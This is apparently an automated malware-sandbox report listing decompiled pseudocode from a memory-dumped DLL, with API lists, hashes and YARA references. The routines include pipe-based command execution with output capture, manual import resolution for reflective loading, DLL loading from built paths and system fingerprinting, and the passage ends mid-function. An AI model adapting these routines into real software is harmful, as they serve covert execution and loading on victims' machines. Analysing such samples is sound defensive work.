								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x15d0590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x15d0590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x15d0590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x15d07b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x15d0590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x164faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x164faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 10010865
\u%04X\u%04X, xrefs: 10010950
\u%04X, xrefs: 10010911

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L10012291();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x10018250;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L10012291();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x10018258;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

APIs

localeconv.MSVCRT ref: 10012207
strchr.MSVCRT ref: 1001221A
_errno.MSVCRT ref: 10012229
strtod.MSVCRT ref: 10012237
_errno.MSVCRT ref: 10012264

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction ID: a7fe3fef6b6346813f09e77c4cbf996122cf10ff1875fbe8eea6711f7156c08d
Opcode Fuzzy Hash: 92f26e4a364c3d80a29fdd1e2403d26020c0f2beabb2bc5ff205f5abd7f33c48
Instruction Fuzzy Hash: 5D0124B9900145FADB02AF20E90168D3BA4EF463A0F3141C0E9806E1A1CB75D9F4C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x1001e688; // 0x15d0590
				GetCurrentProcess();
				_t11 = E1000BA05();
				_t1 = _t29 + 0x1644; // 0x15d1bd4
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E10008FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x15d07b8
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E10008FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E1000E3B6(_t3);
				_t7 = _t29 + 0x220; // 0x15d07b0
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E1000E3F1(_t7);
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

APIs

GetCurrentProcess.KERNEL32(?,?,015D0590,?,10003545), ref: 1000CF90
GetModuleFileNameW.KERNEL32(00000000,015D1BD4,00000105,?,?,015D0590,?,10003545), ref: 1000CFB1
memset.MSVCRT ref: 1000CFE2
GetVersionExA.KERNEL32(015D0590,015D0590,?,10003545), ref: 1000CFED
GetCurrentProcessId.KERNEL32(?,10003545), ref: 1000CFF3

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction ID: 6868e59ac51cffefd4345363f154aaa4011aa3255cd34e47fa6660c1185ef8f7
Opcode Fuzzy Hash: c3299e6d2f0b03601ba1cf598394421de32a902fba2cc4fff372b1365d944c65
Instruction Fuzzy Hash: ED015E749017149BE720DF70888AAEABBE5FF95350F00082DF59687251EB74B744CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1000A9B7, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1000A9B7(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E1000861A( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x1001e684; // 0x164faa0
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x1001e684; // 0x164faa0
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E10008604(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x1001e684; // 0x164faa0
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x1001e684; // 0x164faa0
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x1001e684; // 0x164faa0
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x1001e684; // 0x164faa0
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E100091A6(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E10009292(_t127);
						E1000861A( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E1000C379(_t127));
				_t98 =  *0x1001e68c; // 0x164fc68
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E10009256(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E1000861A( &_v32, 0);
				return _t128;
			}

APIs

memset.MSVCRT ref: 1000A9F4
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 1000AA18
CreatePipe.KERNEL32(100065A9,?,0000000C,00000000), ref: 1000AA2F

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

D, xrefs: 1000AA4F

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeapPipe$AllocFreememset
String ID: D
API String ID: 488076629-2746444292
Opcode ID: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

kernel32.dll, xrefs: 100124B3
GetProcAddress, xrefs: 100124C1

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x15d0590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x15d0590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x15d0590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x15d0590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x15d0590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x164faa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x164fbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

%08x, xrefs: 1000C52F
dll, xrefs: 1000C588

Memory Dump Source

Source File: 0000000D.00000002.561553251.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.561494090.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
